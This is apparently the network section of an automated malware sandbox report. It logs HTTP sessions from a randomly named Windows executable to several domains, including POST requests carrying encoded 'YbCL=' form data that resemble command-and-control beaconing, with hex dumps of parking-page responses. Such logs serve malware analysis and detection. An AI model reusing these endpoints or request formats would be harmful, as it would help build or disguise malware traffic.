dOabsTKeuAErMIAUFC7Ar5cVsle/jjf4LN45xxTRVRV6emuG8tdmKntCw9W+eD38ndgXbLMawc42Pv0 [TRUNCATED]
                                          Jul 4, 2024 16:55:05.599817038 CEST1236INHTTP/1.1 404 Not Found
                                          Date: Thu, 04 Jul 2024 14:55:05 GMT
                                          Server: Apache/2.4.56 (Debian)
                                          X-Powered-By: PHP/7.4.33
                                          Strict-Transport-Security: max-age=63072000; preload
                                          Connection: Upgrade, close
                                          Transfer-Encoding: chunked
                                          Content-Type: text/html; charset=UTF-8
                                          Data Raw: 34 39 61 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 20 20 20 20 20 20 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 44 6f 6d 61 69 6e 20 77 77 77 2e 73 61 6e 64 72 61 6e 6f 6c 6c 2e 63 6f 6d 20 69 73 20 72 65 67 69 73 74 65 72 65 64 20 62 79 20 44 6f 6d 61 69 6e 74 65 63 68 6e 69 6b c2 ae 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 68 74 6d 6c 2b 78 [TRUNCATED]
                                          Data Ascii: 49a<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html lang="en" xmlns="http://www.w3.org/1999/xhtml"><head> <title>Domain www.sandranoll.com is registered by Domaintechnik</title> <meta http-equiv="content-type" content="application/xhtml+xml; charset=UTF-8" /> <meta http-equiv="content-language" content="en" /> <link rel="stylesheet" href="css/styles.css" /></head><body> <div id="parking_page_header"> <div id="parking_page_header_inner"><img src="http://www.domaintechnik.at/data/gfx/dt_logo_parking.png" alt="Domaintechnik.at Logo" /></div> </div> <div id="content"> <h1>The Domain www.sandranoll.com is registered!</h1> <p style="padding:20px 0 10px 0;font-size:1.2em;" class="align-center">Als Domaininhaber k&ouml;nnen Sie Ihre Domains online verwalten, Inhaberdaten aktualisieren, <br />Domainweiterleitungen e
                                          Jul 4, 2024 16:55:05.599869013 CEST1236INData Raw: 69 6e 72 69 63 68 74 65 6e 2c 20 57 65 62 68 6f 73 74 69 6e 67 20 62 65 73 74 65 6c 6c 65 6e 20 75 6e 64 20 56 69 65 6c 65 73 20 6d 65 68 72 2e 3c 62 72 20 2f 3e 45 62 65 6e 73 6f 20 6b 26 6f 75 6d 6c 3b 6e 6e 65 6e 20 53 69 65 20 6f 6e 6c 69 6e
                                          Data Ascii: inrichten, Webhosting bestellen und Vieles mehr.<br />Ebenso k&ouml;nnen Sie online neue Domains registrieren und bei Bedarf ein Web Hosting Paket, auch Webspace genannt, bestellen.</p> <div id="parking_boxes">878<table><tr><td><ta
                                          Jul 4, 2024 16:55:05.599883080 CEST1159INData Raw: 74 64 3e 3c 2f 74 72 3e 3c 74 72 3e 3c 74 64 3e 3c 74 61 62 6c 65 3e 3c 74 72 3e 3c 74 64 20 63 6f 6c 73 70 61 6e 3d 22 32 22 3e 3c 68 32 3e 47 61 6c 6c 65 72 79 20 2d 20 4b 6f 73 74 65 6e 6c 6f 73 65 20 47 61 6c 65 72 69 65 20 53 6f 66 74 77 61
                                          Data Ascii: td></tr><tr><td><table><tr><td colspan="2"><h2>Gallery - Kostenlose Galerie Software!</h2></td></tr><tr><td style="width:100px;text-align:center;"><img style="display:block;" src="https://www.domaintechnik.at/fileadmin/gfx/logos/hostedsoft/gal
                                          Jul 4, 2024 16:55:05.603004932 CEST5INData Raw: 30 0d 0a 0d 0a
                                          Data Ascii: 0


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          28192.168.2.749735213.145.228.16806404C:\Program Files (x86)\tYPbEECIUNGebXluUbJulqzfdqlpyRqdLqNnjxNW\ftlDDsmJxbqfWuvUNSEx.exe
                                          TimestampBytes transferredDirectionData
                                          Jul 4, 2024 16:55:07.399606943 CEST528OUTGET /aroo/?fhW=BLvXr6e0EhyxeX&YbCL=bKy7FSIHmKYFjPoPKsunUN9vBLYaDX52twFEynhtde+XdOqoRjh1sl1n+ba+sSXyFBuEELqLWRHnTW9JDkHGG0QhvMR72FivEUbGSmkuxinEDBYWWrvqFUEDSzpZ60+MRxZstpJridvk HTTP/1.1
                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                          Accept-Language: en-us
                                          Host: www.sandranoll.com
                                          Connection: close
                                          User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
                                          Jul 4, 2024 16:55:08.144592047 CEST1236INHTTP/1.1 404 Not Found
                                          Date: Thu, 04 Jul 2024 14:55:07 GMT
                                          Server: Apache/2.4.56 (Debian)
                                          X-Powered-By: PHP/7.4.33
                                          Strict-Transport-Security: max-age=63072000; preload
                                          Connection: Upgrade, close
                                          Transfer-Encoding: chunked
                                          Content-Type: text/html; charset=UTF-8
                                          Data Raw: 63 61 62 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 20 20 20 20 20 20 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 44 6f 6d 61 69 6e 20 77 77 77 2e 73 61 6e 64 72 61 6e 6f 6c 6c 2e 63 6f 6d 20 69 73 20 72 65 67 69 73 74 65 72 65 64 20 62 79 20 44 6f 6d 61 69 6e 74 65 63 68 6e 69 6b c2 ae 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 68 74 6d 6c 2b 78 [TRUNCATED]
                                          Data Ascii: cab<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html lang="en" xmlns="http://www.w3.org/1999/xhtml"><head> <title>Domain www.sandranoll.com is registered by Domaintechnik</title> <meta http-equiv="content-type" content="application/xhtml+xml; charset=UTF-8" /> <meta http-equiv="content-language" content="en" /> <link rel="stylesheet" href="css/styles.css" /></head><body> <div id="parking_page_header"> <div id="parking_page_header_inner"><img src="http://www.domaintechnik.at/data/gfx/dt_logo_parking.png" alt="Domaintechnik.at Logo" /></div> </div> <div id="content"> <h1>The Domain www.sandranoll.com is registered!</h1> <p style="padding:20px 0 10px 0;font-size:1.2em;" class="align-center">Als Domaininhaber k&ouml;nnen Sie Ihre Domains online verwalten, Inhaberdaten aktualisieren, <br />Domainweiterleitungen e
                                          Jul 4, 2024 16:55:08.144619942 CEST1236INData Raw: 69 6e 72 69 63 68 74 65 6e 2c 20 57 65 62 68 6f 73 74 69 6e 67 20 62 65 73 74 65 6c 6c 65 6e 20 75 6e 64 20 56 69 65 6c 65 73 20 6d 65 68 72 2e 3c 62 72 20 2f 3e 45 62 65 6e 73 6f 20 6b 26 6f 75 6d 6c 3b 6e 6e 65 6e 20 53 69 65 20 6f 6e 6c 69 6e
                                          Data Ascii: inrichten, Webhosting bestellen und Vieles mehr.<br />Ebenso k&ouml;nnen Sie online neue Domains registrieren und bei Bedarf ein Web Hosting Paket, auch Webspace genannt, bestellen.</p> <div id="parking_boxes"><table><tr><td><table><tr
                                          Jul 4, 2024 16:55:08.144633055 CEST1049INData Raw: 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 22 3e 3c 69 6d 67 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 64 6f 6d 61 69 6e 74 65 63 68 6e 69 6b 2e 61 74 2f 66 69 6c 65 61 64 6d 69 6e 2f 67 66 78 2f 69 63 6f 6e 73 2f 63 6f 6e 74 72 6f 6c 5f 70
                                          Data Ascii: lign:center;"><img src="https://www.domaintechnik.at/fileadmin/gfx/icons/control_panel_icon.gif" alt="Hosting Control Panel" /></td><td style="width:300px;">Mit dem Domaintechnik.at Hosting Control Panel verwalten Sie alle Belange Ihres Hostin
                                          Jul 4, 2024 16:55:08.148912907 CEST5INData Raw: 30 0d 0a 0d 0a
                                          Data Ascii: 0


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          29192.168.2.74973691.195.240.19806404C:\Program Files (x86)\tYPbEECIUNGebXluUbJulqzfdqlpyRqdLqNnjxNW\ftlDDsmJxbqfWuvUNSEx.exe
                                          TimestampBytes transferredDirectionData
                                          Jul 4, 2024 16:55:13.231476068 CEST790OUTPOST /tf44/ HTTP/1.1
                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                          Accept-Language: en-us
                                          Accept-Encoding: gzip, deflate, br
                                          Host: www.gipsytroya.com
                                          Origin: http://www.gipsytroya.com
                                          Cache-Control: max-age=0
                                          Connection: close
                                          Content-Type: application/x-www-form-urlencoded
                                          Content-Length: 217
                                          Referer: http://www.gipsytroya.com/tf44/
                                          User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
                                          Data Raw: 59 62 43 4c 3d 2b 46 4b 67 62 50 42 6e 79 56 6f 6b 37 6c 2f 32 47 70 41 55 34 73 54 41 75 68 36 59 41 37 77 46 6f 6e 4a 54 76 38 6f 59 51 47 65 36 58 43 4e 4e 6b 34 4e 58 4a 33 32 59 45 4b 4d 36 46 57 54 69 64 68 43 34 58 4d 64 47 76 2f 5a 77 37 68 6b 37 35 49 2f 4b 32 76 76 7a 45 65 59 46 42 35 6e 51 48 78 4b 50 6c 45 41 36 45 31 69 30 66 32 4e 66 48 69 53 49 71 44 59 58 38 63 69 4f 48 6a 2f 36 52 54 61 53 64 39 67 67 42 54 30 71 4f 39 56 4d 6d 73 31 39 66 64 4a 43 58 38 67 39 68 72 75 63 50 37 71 6a 76 65 39 55 56 69 57 46 79 62 4b 5a 68 54 48 35 4a 45 34 76 67 50 67 76 53 67 6b 54 59 55 6e 65 65 49 5a 6b 53 7a 74 33 30 31 77 37 50 41 3d 3d
                                          Data Ascii: YbCL=+FKgbPBnyVok7l/2GpAU4sTAuh6YA7wFonJTv8oYQGe6XCNNk4NXJ32YEKM6FWTidhC4XMdGv/Zw7hk75I/K2vvzEeYFB5nQHxKPlEA6E1i0f2NfHiSIqDYX8ciOHj/6RTaSd9ggBT0qO9VMms19fdJCX8g9hrucP7qjve9UViWFybKZhTH5JE4vgPgvSgkTYUneeIZkSzt301w7PA==
                                          Jul 4, 2024 16:55:13.875991106 CEST707INHTTP/1.1 405 Not Allowed
                                          date: Thu, 04 Jul 2024 14:55:13 GMT
                                          content-type: text/html
                                          content-length: 556
                                          server: Parking/1.0
                                          connection: close
                                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 [TRUNCATED]
                                          Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          30192.168.2.74973791.195.240.19806404C:\Program Files (x86)\tYPbEECIUNGebXluUbJulqzfdqlpyRqdLqNnjxNW\ftlDDsmJxbqfWuvUNSEx.exe
                                          TimestampBytes transferredDirectionData
                                          Jul 4, 2024 16:55:15.777513981 CEST810OUTPOST /tf44/ HTTP/1.1
                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                          Accept-Language: en-us
                                          Accept-Encoding: gzip, deflate, br
                                          Host: www.gipsytroya.com
                                          Origin: http://www.gipsytroya.com
                                          Cache-Control: max-age=0
                                          Connection: close
                                          Content-Type: application/x-www-form-urlencoded
                                          Content-Length: 237
                                          Referer: http://www.gipsytroya.com/tf44/
                                          User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
                                          Data Raw: 59 62 43 4c 3d 2b 46 4b 67 62 50 42 6e 79 56 6f 6b 36 45 76 32 45 4b 34 55 2f 4d 54 48 72 68 36 59 57 4c 77 42 6f 6e 56 54 76 35 46 46 58 31 71 36 58 69 39 4e 6c 35 4e 58 4b 33 32 59 63 36 4d 46 4c 32 54 70 64 68 4f 77 58 4a 39 47 76 2f 39 77 37 6c 67 37 35 2f 44 4a 33 2f 76 39 64 4f 59 48 63 70 6e 51 48 78 4b 50 6c 45 6c 76 45 7a 4b 30 66 69 4a 66 57 32 47 4c 6d 6a 59 57 35 73 69 4f 57 7a 2f 2b 52 54 61 67 64 2f 46 46 42 52 38 71 4f 38 6c 4d 6e 39 31 2b 57 64 4a 45 61 63 68 4a 6f 5a 72 33 47 71 2b 61 6d 39 78 4b 64 69 2b 63 36 4e 58 37 37 78 4c 56 58 56 41 55 6b 4e 45 5a 46 47 35 6d 61 56 6a 47 54 71 74 46 4e 45 49 64 35 6e 52 2f 5a 78 6f 50 4b 66 2f 55 32 78 30 5a 6f 47 6a 61 6a 57 63 6a 58 69 63 3d
                                          Data Ascii: YbCL=+FKgbPBnyVok6Ev2EK4U/MTHrh6YWLwBonVTv5FFX1q6Xi9Nl5NXK32Yc6MFL2TpdhOwXJ9Gv/9w7lg75/DJ3/v9dOYHcpnQHxKPlElvEzK0fiJfW2GLmjYW5siOWz/+RTagd/FFBR8qO8lMn91+WdJEachJoZr3Gq+am9xKdi+c6NX77xLVXVAUkNEZFG5maVjGTqtFNEId5nR/ZxoPKf/U2x0ZoGjajWcjXic=
                                          Jul 4, 2024 16:55:16.422389030 CEST707INHTTP/1.1 405 Not Allowed
                                          date: Thu, 04 Jul 2024 14:55:16 GMT
                                          content-type: text/html
                                          content-length: 556
                                          server: Parking/1.0
                                          connection: close
                                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 [TRUNCATED]
                                          Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          31192.168.2.74973891.195.240.19806404C:\Program Files (x86)\tYPbEECIUNGebXluUbJulqzfdqlpyRqdLqNnjxNW\ftlDDsmJxbqfWuvUNSEx.exe
                                          TimestampBytes transferredDirectionData
                                          Jul 4, 2024 16:55:18.307742119 CEST1823OUTPOST /tf44/ HTTP/1.1
                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                          Accept-Language: en-us
                                          Accept-Encoding: gzip, deflate, br
                                          Host: www.gipsytroya.com
                                          Origin: http://www.gipsytroya.com
                                          Cache-Control: max-age=0
                                          Connection: close
                                          Content-Type: application/x-www-form-urlencoded
                                          Content-Length: 1249
                                          Referer: http://www.gipsytroya.com/tf44/
                                          User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
                                          Data Raw: 59 62 43 4c 3d 2b 46 4b 67 62 50 42 6e 79 56 6f 6b 36 45 76 32 45 4b 34 55 2f 4d 54 48 72 68 36 59 57 4c 77 42 6f 6e 56 54 76 35 46 46 58 30 53 36 58 78 31 4e 6b 61 56 58 4c 33 32 59 43 4b 4d 45 4c 32 54 30 64 6c 69 4b 58 4a 35 57 76 39 31 77 36 47 34 37 2f 4f 44 4a 2b 2f 76 39 41 65 59 47 42 35 6d 4b 48 77 36 31 6c 45 31 76 45 7a 4b 30 66 6a 35 66 57 69 53 4c 6b 6a 59 58 38 63 69 43 48 6a 2f 57 52 51 72 56 64 2f 42 2f 43 69 45 71 4f 63 31 4d 6c 50 74 2b 64 64 4a 47 4a 73 68 52 6f 59 58 6f 47 75 57 34 6d 38 31 30 64 68 65 63 72 49 6e 69 6d 51 72 42 4d 31 4e 4f 6c 39 49 75 4c 56 39 53 65 48 7a 4e 51 64 49 6c 47 58 55 64 30 32 39 7a 54 6c 70 4a 63 35 32 2b 39 41 38 69 6d 54 65 2b 6e 47 41 69 56 30 6d 72 75 34 32 58 6c 4f 54 4d 58 4b 78 50 6a 35 39 65 48 4d 4b 72 46 69 6e 32 36 4b 73 57 55 31 4c 31 33 2f 32 73 44 34 38 46 37 35 76 62 77 72 41 50 52 34 31 37 41 31 74 36 31 4f 48 41 54 4f 44 53 62 39 78 6e 58 57 46 59 36 4c 4a 73 4d 78 67 72 74 45 30 4e 56 41 77 64 6d 49 50 41 47 6b 39 33 44 57 62 4b 76 [TRUNCATED]
                                          Data Ascii: YbCL=+FKgbPBnyVok6Ev2EK4U/MTHrh6YWLwBonVTv5FFX0S6Xx1NkaVXL32YCKMEL2T0dliKXJ5Wv91w6G47/ODJ+/v9AeYGB5mKHw61lE1vEzK0fj5fWiSLkjYX8ciCHj/WRQrVd/B/CiEqOc1MlPt+ddJGJshRoYXoGuW4m810dhecrInimQrBM1NOl9IuLV9SeHzNQdIlGXUd029zTlpJc52+9A8imTe+nGAiV0mru42XlOTMXKxPj59eHMKrFin26KsWU1L13/2sD48F75vbwrAPR417A1t61OHATODSb9xnXWFY6LJsMxgrtE0NVAwdmIPAGk93DWbKvlATDjDHzoLaZLGuxCuNHn4Oc3Lcw8qW9ljCs9g3k/JVgYg9rgnfoMQeyEVVZG91H305bwAjzUaSMaveR5bDY4/o4EZwMD51lYIl++eP9liPrxwXG7KrRKQTaJHhs9vM9slpQZzV6uZHKg/5FXnBh5x6IdB+EPoNdQGVUn+Q2/+I4usxXS1h5N5J8EfNMXdSlfZWCY+Xo7XE+/ExCCJgHXAqWFG0HKOBfxmkyckg3Ftj1G4TA2fAWdc7Wa/tGHv+9jGLeZCy9QrZMtx17N3UVhZDh+y56iwRRk64PXlhZtNuBvmCUK883i5wdUB7E82IYQq95ZwdbYTeJlbHVdPkipn8Yt2+7TxWu5RroWIDXVNBj3ksr4joim9DEaNTEBaihCj07Px8cf2wWPRHvlsaPMiZarQwLL8AoDN6IFbNiDwImEA9MyGcR//UN5e10b9V5PJ/JgxeChWZuOhCcvCcHEPEcLmiUUDBqMDcfEY6WWjAii0nIuSv94PJexSAeGWckZqJsZ2ZLFKN4tPtDBM5cisFbTxiHOKFJqPxXLN/Mi2x7BbLEU5gQltVzzou54D5iNd4VPIbRdAcFOlWPILKgL5e0EO0Sev79wz6vjmu1HxhZsZIpGQ6whC76IY0hBVVv46ML4MIu7HB6MnqcvnggI1rxKaXsAuN6mw [TRUNCATED]


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          32192.168.2.74973991.195.240.19806404C:\Program Files (x86)\tYPbEECIUNGebXluUbJulqzfdqlpyRqdLqNnjxNW\ftlDDsmJxbqfWuvUNSEx.exe
                                          TimestampBytes transferredDirectionData
                                          Jul 4, 2024 16:55:20.836631060 CEST528OUTGET /tf44/?YbCL=zHiAY6EG+HxIxFu8Foth356DlimOdN8M+W8Rr/tGfSzDPDxggLk9FyyADeImH3/ZYgS5WMd+vNhhyXlbnciyxdfJd/gaB8T0bTbhtXVrFmCpPW1iSF+B9h4XvImdTXjqQBmtK+ZYAHNG&fhW=BLvXr6e0EhyxeX HTTP/1.1
                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                          Accept-Language: en-us
                                          Host: www.gipsytroya.com
                                          Connection: close
                                          User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
                                          Jul 4, 2024 16:55:21.492542982 CEST113INHTTP/1.1 439
                                          date: Thu, 04 Jul 2024 14:55:21 GMT
                                          content-length: 0
                                          server: Parking/1.0
                                          connection: close


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          33192.168.2.749740194.58.112.174806404C:\Program Files (x86)\tYPbEECIUNGebXluUbJulqzfdqlpyRqdLqNnjxNW\ftlDDsmJxbqfWuvUNSEx.exe
                                          TimestampBytes transferredDirectionData
                                          Jul 4, 2024 16:55:26.621589899 CEST805OUTPOST /mooq/ HTTP/1.1
                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                          Accept-Language: en-us
                                          Accept-Encoding: gzip, deflate, br
                                          Host: www.helpers-lion.online
                                          Origin: http://www.helpers-lion.online
                                          Cache-Control: max-age=0
                                          Connection: close
                                          Content-Type: application/x-www-form-urlencoded
                                          Content-Length: 217
                                          Referer: http://www.helpers-lion.online/mooq/
                                          User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
                                          Data Raw: 59 62 43 4c 3d 33 41 52 4a 70 41 4f 43 46 54 64 57 33 52 42 38 33 49 62 4b 43 6f 51 66 34 6b 2f 52 64 68 69 31 57 79 69 69 30 73 54 56 46 56 2f 4c 66 58 36 68 4a 69 54 4e 38 41 56 6d 75 53 62 39 4f 61 33 48 72 48 4d 52 51 6a 63 45 44 76 62 36 48 52 49 34 67 43 49 6a 6e 4e 63 6a 52 47 45 6d 35 33 56 71 68 43 75 77 46 6d 62 4e 68 41 74 45 54 2f 77 4a 47 6e 61 37 59 38 58 33 6e 4e 7a 44 6c 67 6d 39 4f 45 64 41 49 2f 36 55 7a 56 52 61 74 4e 68 4f 34 71 4b 45 6d 78 30 4c 6f 41 37 75 41 46 71 72 44 30 47 2f 59 61 50 4d 58 71 36 4d 70 62 55 61 43 47 73 57 58 4c 56 66 71 52 36 7a 59 47 30 4e 30 6f 53 47 76 50 59 64 31 35 65 56 59 36 54 66 58 51 3d 3d
                                          Data Ascii: YbCL=3ARJpAOCFTdW3RB83IbKCoQf4k/Rdhi1Wyii0sTVFV/LfX6hJiTN8AVmuSb9Oa3HrHMRQjcEDvb6HRI4gCIjnNcjRGEm53VqhCuwFmbNhAtET/wJGna7Y8X3nNzDlgm9OEdAI/6UzVRatNhO4qKEmx0LoA7uAFqrD0G/YaPMXq6MpbUaCGsWXLVfqR6zYG0N0oSGvPYd15eVY6TfXQ==
                                          Jul 4, 2024 16:55:27.350744009 CEST1236INHTTP/1.1 404 Not Found
                                          Server: nginx
                                          Date: Thu, 04 Jul 2024 14:55:27 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: close
                                          Content-Encoding: gzip
                                          Data Raw: 65 33 34 0d 0a 1f 8b 08 00 00 00 00 00 00 03 cd 5a 6d 6f db d6 15 fe 9e 5f 71 a3 01 96 94 88 64 9c b4 43 12 4b 72 d3 a4 db 97 b4 1d e0 74 c3 e0 a6 c2 15 75 2d b1 a2 48 8d a4 ec a8 49 80 36 e9 2b 1a 34 68 57 60 43 b1 f7 61 d8 a7 01 89 13 af 6e 5e 9c bf 40 fe a3 3d e7 5c 92 a2 64 c9 71 d2 b4 ab 01 db d2 7d 3d f7 9c e7 3c e7 dc 97 fa d1 8e 6f 47 e3 a1 12 bd 68 e0 36 eb f4 57 d8 ae 0c c3 46 c9 09 5b b2 23 87 91 b3 a9 4a c2 95 5e b7 51 0a 46 25 b4 51 b2 d3 ac 0f 54 24 85 dd 93 41 a8 a2 46 e9 ad 4b bf 30 4e a3 8e 4b 3d 39 50 8d d2 50 06 7d c7 eb 96 84 ed 7b 91 f2 d0 28 50 dd 60 64 04 18 73 ba e5 a6 a3 b6 86 7e 10 15 9a 6e 39 9d a8 d7 e8 a8 4d c7 56 06 7f a9 39 9e 13 39 d2 35 42 5b ba aa b1 8c 21 22 27 72 55 73 6b 6b cb ec 29 77 a8 82 d0 70 1d df 33 7d cf 75 3c 55 b7 74 75 1d 5f fa 22 50 6e a3 14 46 63 57 85 3d a5 30 d3 40 75 1c d9 28 49 d7 2d 89 5e a0 36 72 79 59 3e 43 8e 22 df b4 c3 10 b3 4c fa 3b 58 49 d6 7a 43 42 34 4c 86 3f ab cb 25 41 2a 84 c6 06 b2 ab ac 2b 06 37 6c d6 43 3b 70 86 51 